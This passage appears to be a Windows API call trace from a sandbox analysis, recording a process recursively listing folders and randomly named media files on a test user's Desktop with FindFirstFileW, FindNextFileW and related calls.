ftLastAccessTime.dwHighDateTime=0x1d8b542, ftLastWriteTime.dwLowDateTime=0x16c1880, ftLastWriteTime.dwHighDateTime=0x1d8b542, nFileSizeHigh=0x0, nFileSizeLow=0xfe3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="atgGmH16.gif", cAlternateFileName="")) returned 1 [0165.922] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8138f420, ftCreationTime.dwHighDateTime=0x1d8bc18, ftLastAccessTime.dwLowDateTime=0xb4593810, ftLastAccessTime.dwHighDateTime=0x1d8be1b, ftLastWriteTime.dwLowDateTime=0xb4593810, ftLastWriteTime.dwHighDateTime=0x1d8be1b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BN91lKiFOeJlVa", cAlternateFileName="BN91LK~1")) returned 1 [0165.922] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8138f420, ftCreationTime.dwHighDateTime=0x1d8bc18, ftLastAccessTime.dwLowDateTime=0xb4593810, ftLastAccessTime.dwHighDateTime=0x1d8be1b, ftLastWriteTime.dwLowDateTime=0xb4593810, ftLastWriteTime.dwHighDateTime=0x1d8be1b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BN91lKiFOeJlVa", cAlternateFileName="BN91LK~1")) returned 0 [0165.922] FindClose (in: hFindFile=0x5bfe278 | out: hFindFile=0x5bfe278) returned 1 [0165.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e204) returned 1 [0165.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e464) returned 1 [0165.922] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\81z5--fcv\\bn91lkifoejlva")) returned 0x10 [0165.923] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\81z5--fcv\\bn91lkifoejlva")) returned 0x10 [0165.923] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0165.923] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa", nBufferLength=0x40, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa", lpFilePart=0x0) returned 0x3f [0165.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e3c8) returned 1 [0165.923] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0165.923] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa", nBufferLength=0x40, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa", lpFilePart=0x0) returned 0x3f [0165.923] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\81z5--fcv\\bn91lkifoejlva\\*"), lpFindFileData=0x5a0e178 | out: lpFindFileData=0x5a0e178*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8138f420, ftCreationTime.dwHighDateTime=0x1d8bc18, ftLastAccessTime.dwLowDateTime=0xb4593810, ftLastAccessTime.dwHighDateTime=0x1d8be1b, ftLastWriteTime.dwLowDateTime=0xb4593810, ftLastWriteTime.dwHighDateTime=0x1d8be1b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe278 [0165.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e3c8) returned 1 [0165.924] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0165.924] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa", nBufferLength=0x40, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa", lpFilePart=0x0) returned 0x3f [0165.924] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\81z5--fcv\\bn91lkifoejlva\\*"), lpFindFileData=0x5a0e178 | out: lpFindFileData=0x5a0e178*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8138f420, ftCreationTime.dwHighDateTime=0x1d8bc18, ftLastAccessTime.dwLowDateTime=0xb4593810, ftLastAccessTime.dwHighDateTime=0x1d8be1b, ftLastWriteTime.dwLowDateTime=0xb4593810, ftLastWriteTime.dwHighDateTime=0x1d8be1b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe138 [0165.924] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e1cc | out: lpFindFileData=0x5a0e1cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8138f420, ftCreationTime.dwHighDateTime=0x1d8bc18, ftLastAccessTime.dwLowDateTime=0xb4593810, ftLastAccessTime.dwHighDateTime=0x1d8be1b, ftLastWriteTime.dwLowDateTime=0xb4593810, ftLastWriteTime.dwHighDateTime=0x1d8be1b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.924] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e1cc | out: lpFindFileData=0x5a0e1cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9468f7d0, ftCreationTime.dwHighDateTime=0x1d8b24e, ftLastAccessTime.dwLowDateTime=0x2a1b8f70, ftLastAccessTime.dwHighDateTime=0x1d8b3c8, ftLastWriteTime.dwLowDateTime=0x2a1b8f70, ftLastWriteTime.dwHighDateTime=0x1d8b3c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4itOfZ7D5Sh", cAlternateFileName="4ITOFZ~1")) returned 1 [0165.925] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e1cc | out: lpFindFileData=0x5a0e1cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x558617d0, ftCreationTime.dwHighDateTime=0x1d8bebc, ftLastAccessTime.dwLowDateTime=0xf7413c0, ftLastAccessTime.dwHighDateTime=0x1d8c0c7, ftLastWriteTime.dwLowDateTime=0xf7413c0, ftLastWriteTime.dwHighDateTime=0x1d8c0c7, nFileSizeHigh=0x0, nFileSizeLow=0xcbeb, dwReserved0=0x0, dwReserved1=0x0, cFileName="htgHfvJln.mkv", cAlternateFileName="HTGHFV~1.MKV")) returned 1 [0165.925] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e1cc | out: lpFindFileData=0x5a0e1cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1af7ed00, ftCreationTime.dwHighDateTime=0x1d8be26, ftLastAccessTime.dwLowDateTime=0x8d756070, ftLastAccessTime.dwHighDateTime=0x1d8be84, ftLastWriteTime.dwLowDateTime=0x8d756070, ftLastWriteTime.dwHighDateTime=0x1d8be84, nFileSizeHigh=0x0, nFileSizeLow=0xe6d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="TKV8.mp4", cAlternateFileName="")) returned 1 [0165.925] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e1cc | out: lpFindFileData=0x5a0e1cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1af7ed00, ftCreationTime.dwHighDateTime=0x1d8be26, ftLastAccessTime.dwLowDateTime=0x8d756070, ftLastAccessTime.dwHighDateTime=0x1d8be84, ftLastWriteTime.dwLowDateTime=0x8d756070, ftLastWriteTime.dwHighDateTime=0x1d8be84, nFileSizeHigh=0x0, nFileSizeLow=0xe6d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="TKV8.mp4", cAlternateFileName="")) returned 0 [0165.925] FindClose (in: hFindFile=0x5bfe278 | out: hFindFile=0x5bfe278) returned 1 [0165.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e184) returned 1 [0165.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e3e4) returned 1 [0165.925] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e1cc | out: lpFindFileData=0x5a0e1cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8138f420, ftCreationTime.dwHighDateTime=0x1d8bc18, ftLastAccessTime.dwLowDateTime=0xb4593810, ftLastAccessTime.dwHighDateTime=0x1d8be1b, ftLastWriteTime.dwLowDateTime=0xb4593810, ftLastWriteTime.dwHighDateTime=0x1d8be1b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.925] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e1cc | out: lpFindFileData=0x5a0e1cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9468f7d0, ftCreationTime.dwHighDateTime=0x1d8b24e, ftLastAccessTime.dwLowDateTime=0x2a1b8f70, ftLastAccessTime.dwHighDateTime=0x1d8b3c8, ftLastWriteTime.dwLowDateTime=0x2a1b8f70, ftLastWriteTime.dwHighDateTime=0x1d8b3c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4itOfZ7D5Sh", cAlternateFileName="4ITOFZ~1")) returned 1 [0165.925] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e1cc | out: lpFindFileData=0x5a0e1cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x558617d0, ftCreationTime.dwHighDateTime=0x1d8bebc, ftLastAccessTime.dwLowDateTime=0xf7413c0, ftLastAccessTime.dwHighDateTime=0x1d8c0c7, ftLastWriteTime.dwLowDateTime=0xf7413c0, ftLastWriteTime.dwHighDateTime=0x1d8c0c7, nFileSizeHigh=0x0, nFileSizeLow=0xcbeb, dwReserved0=0x0, dwReserved1=0x0, cFileName="htgHfvJln.mkv", cAlternateFileName="HTGHFV~1.MKV")) returned 1 [0165.926] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e1cc | out: lpFindFileData=0x5a0e1cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1af7ed00, ftCreationTime.dwHighDateTime=0x1d8be26, ftLastAccessTime.dwLowDateTime=0x8d756070, ftLastAccessTime.dwHighDateTime=0x1d8be84, ftLastWriteTime.dwLowDateTime=0x8d756070, ftLastWriteTime.dwHighDateTime=0x1d8be84, nFileSizeHigh=0x0, nFileSizeLow=0xe6d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="TKV8.mp4", cAlternateFileName="")) returned 1 [0165.926] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e1cc | out: lpFindFileData=0x5a0e1cc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0165.926] FindClose (in: hFindFile=0x5bfe138 | out: hFindFile=0x5bfe138) returned 1 [0165.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e184) returned 1 [0165.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e3e4) returned 1 [0165.926] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa\\4itOfZ7D5Sh" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\81z5--fcv\\bn91lkifoejlva\\4itofz7d5sh")) returned 0x10 [0165.927] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa\\4itOfZ7D5Sh" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\81z5--fcv\\bn91lkifoejlva\\4itofz7d5sh")) returned 0x10 [0165.927] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa\\4itOfZ7D5Sh", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0165.927] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa\\4itOfZ7D5Sh", nBufferLength=0x4c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa\\4itOfZ7D5Sh", lpFilePart=0x0) returned 0x4b [0165.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e348) returned 1 [0165.927] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa\\4itOfZ7D5Sh", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0165.927] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa\\4itOfZ7D5Sh", nBufferLength=0x4c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa\\4itOfZ7D5Sh", lpFilePart=0x0) returned 0x4b [0165.927] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa\\4itOfZ7D5Sh\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\81z5--fcv\\bn91lkifoejlva\\4itofz7d5sh\\*"), lpFindFileData=0x5a0e0f8 | out: lpFindFileData=0x5a0e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9468f7d0, ftCreationTime.dwHighDateTime=0x1d8b24e, ftLastAccessTime.dwLowDateTime=0x2a1b8f70, ftLastAccessTime.dwHighDateTime=0x1d8b3c8, ftLastWriteTime.dwLowDateTime=0x2a1b8f70, ftLastWriteTime.dwHighDateTime=0x1d8b3c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe138 [0165.928] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e348) returned 1 [0165.928] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa\\4itOfZ7D5Sh", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0165.928] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa\\4itOfZ7D5Sh", nBufferLength=0x4c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa\\4itOfZ7D5Sh", lpFilePart=0x0) returned 0x4b [0165.928] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa\\4itOfZ7D5Sh\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\81z5--fcv\\bn91lkifoejlva\\4itofz7d5sh\\*"), lpFindFileData=0x5a0e0f8 | out: lpFindFileData=0x5a0e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9468f7d0, ftCreationTime.dwHighDateTime=0x1d8b24e, ftLastAccessTime.dwLowDateTime=0x2a1b8f70, ftLastAccessTime.dwHighDateTime=0x1d8b3c8, ftLastWriteTime.dwLowDateTime=0x2a1b8f70, ftLastWriteTime.dwHighDateTime=0x1d8b3c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe278 [0165.928] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e14c | out: lpFindFileData=0x5a0e14c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9468f7d0, ftCreationTime.dwHighDateTime=0x1d8b24e, ftLastAccessTime.dwLowDateTime=0x2a1b8f70, ftLastAccessTime.dwHighDateTime=0x1d8b3c8, ftLastWriteTime.dwLowDateTime=0x2a1b8f70, ftLastWriteTime.dwHighDateTime=0x1d8b3c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.928] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e14c | out: lpFindFileData=0x5a0e14c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd01cf00, ftCreationTime.dwHighDateTime=0x1d8b31c, ftLastAccessTime.dwLowDateTime=0x66c3080, ftLastAccessTime.dwHighDateTime=0x1d8bb24, ftLastWriteTime.dwLowDateTime=0x66c3080, ftLastWriteTime.dwHighDateTime=0x1d8bb24, nFileSizeHigh=0x0, nFileSizeLow=0x85f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="nQuTEfOjYTvRe.wav", cAlternateFileName="NQUTEF~1.WAV")) returned 1 [0165.928] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e14c | out: lpFindFileData=0x5a0e14c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd01cf00, ftCreationTime.dwHighDateTime=0x1d8b31c, ftLastAccessTime.dwLowDateTime=0x66c3080, ftLastAccessTime.dwHighDateTime=0x1d8bb24, ftLastWriteTime.dwLowDateTime=0x66c3080, ftLastWriteTime.dwHighDateTime=0x1d8bb24, nFileSizeHigh=0x0, nFileSizeLow=0x85f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="nQuTEfOjYTvRe.wav", cAlternateFileName="NQUTEF~1.WAV")) returned 0 [0165.928] FindClose (in: hFindFile=0x5bfe138 | out: hFindFile=0x5bfe138) returned 1 [0165.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e104) returned 1 [0165.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e364) returned 1 [0165.929] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e14c | out: lpFindFileData=0x5a0e14c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9468f7d0, ftCreationTime.dwHighDateTime=0x1d8b24e, ftLastAccessTime.dwLowDateTime=0x2a1b8f70, ftLastAccessTime.dwHighDateTime=0x1d8b3c8, ftLastWriteTime.dwLowDateTime=0x2a1b8f70, ftLastWriteTime.dwHighDateTime=0x1d8b3c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.929] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e14c | out: lpFindFileData=0x5a0e14c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd01cf00, ftCreationTime.dwHighDateTime=0x1d8b31c, ftLastAccessTime.dwLowDateTime=0x66c3080, ftLastAccessTime.dwHighDateTime=0x1d8bb24, ftLastWriteTime.dwLowDateTime=0x66c3080, ftLastWriteTime.dwHighDateTime=0x1d8bb24, nFileSizeHigh=0x0, nFileSizeLow=0x85f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="nQuTEfOjYTvRe.wav", cAlternateFileName="NQUTEF~1.WAV")) returned 1 [0165.929] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e14c | out: lpFindFileData=0x5a0e14c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0165.929] FindClose (in: hFindFile=0x5bfe278 | out: hFindFile=0x5bfe278) returned 1 [0165.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e104) returned 1 [0165.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e364) returned 1 [0165.929] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa\\4itOfZ7D5Sh\\nQuTEfOjYTvRe.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\81z5--fcv\\bn91lkifoejlva\\4itofz7d5sh\\nqutefojytvre.wav")) returned 0x20 [0165.930] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa\\htgHfvJln.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\81z5--fcv\\bn91lkifoejlva\\htghfvjln.mkv")) returned 0x20 [0165.930] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\BN91lKiFOeJlVa\\TKV8.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\81z5--fcv\\bn91lkifoejlva\\tkv8.mp4")) returned 0x20 [0165.930] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\AC1n-76cpWFuDg.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\81z5--fcv\\ac1n-76cpwfudg.mp4")) returned 0x20 [0165.930] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\81z5--FCV\\atgGmH16.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\81z5--fcv\\atggmh16.gif")) returned 0x20 [0165.931] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\AGsMi4sruTUxCDEM" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\agsmi4srutuxcdem")) returned 0x10 [0165.931] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\AGsMi4sruTUxCDEM" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\agsmi4srutuxcdem")) returned 0x10 [0165.931] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\AGsMi4sruTUxCDEM", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0165.931] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\AGsMi4sruTUxCDEM", nBufferLength=0x38, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\AGsMi4sruTUxCDEM", lpFilePart=0x0) returned 0x37 [0165.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e448) returned 1 [0165.931] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\AGsMi4sruTUxCDEM", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0165.931] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\AGsMi4sruTUxCDEM", nBufferLength=0x38, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\AGsMi4sruTUxCDEM", lpFilePart=0x0) returned 0x37 [0165.931] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\AGsMi4sruTUxCDEM\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\agsmi4srutuxcdem\\*"), lpFindFileData=0x5a0e1f8 | out: lpFindFileData=0x5a0e1f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22715180, ftCreationTime.dwHighDateTime=0x1d8bcf9, ftLastAccessTime.dwLowDateTime=0x638ca90, ftLastAccessTime.dwHighDateTime=0x1d8be3c, ftLastWriteTime.dwLowDateTime=0x638ca90, ftLastWriteTime.dwHighDateTime=0x1d8be3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe278 [0165.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e448) returned 1 [0165.932] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\AGsMi4sruTUxCDEM", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0165.932] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\AGsMi4sruTUxCDEM", nBufferLength=0x38, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\AGsMi4sruTUxCDEM", lpFilePart=0x0) returned 0x37 [0165.932] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FnStQZfb tK\\AGsMi4sruTUxCDEM\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\fnstqzfb tk\\agsmi4srutuxcdem\\*"), lpFindFileData=0x5a0e1f8 | out: lpFindFileData=0x5a0e1f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22715180, ftCreationTime.dwHighDateTime=0x1d8bcf9, ftLastAccessTime.dwLowDateTime=0x638ca90, ftLastAccessTime.dwHighDateTime=0x1d8be3c, ftLastWriteTime.dwLowDateTime=0x638ca90, ftLastWriteTime.dwHighDateTime=0x1d8be3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe138 [0165.932] FindNextFileW (in: hFindFile=0x5bfe278, lpFindFileData=0x5a0e24c | out: lpFindFileData=0x5a0e24c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22715180, ftCreationTime.dwHighDateTime=0x1d8bcf9, ftLastAccessTime.dwLowDateTime=0x638ca90, ftLastAccessTime.dwHighDateTime=0x1d8be3c, ftLastWriteTime.dwLowDateTime=0x638ca90, ftLastWriteTime.dwHighDateTime=0x1d8be3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.932] FindNextFileW (in: hFindFile=0x5bfe278, 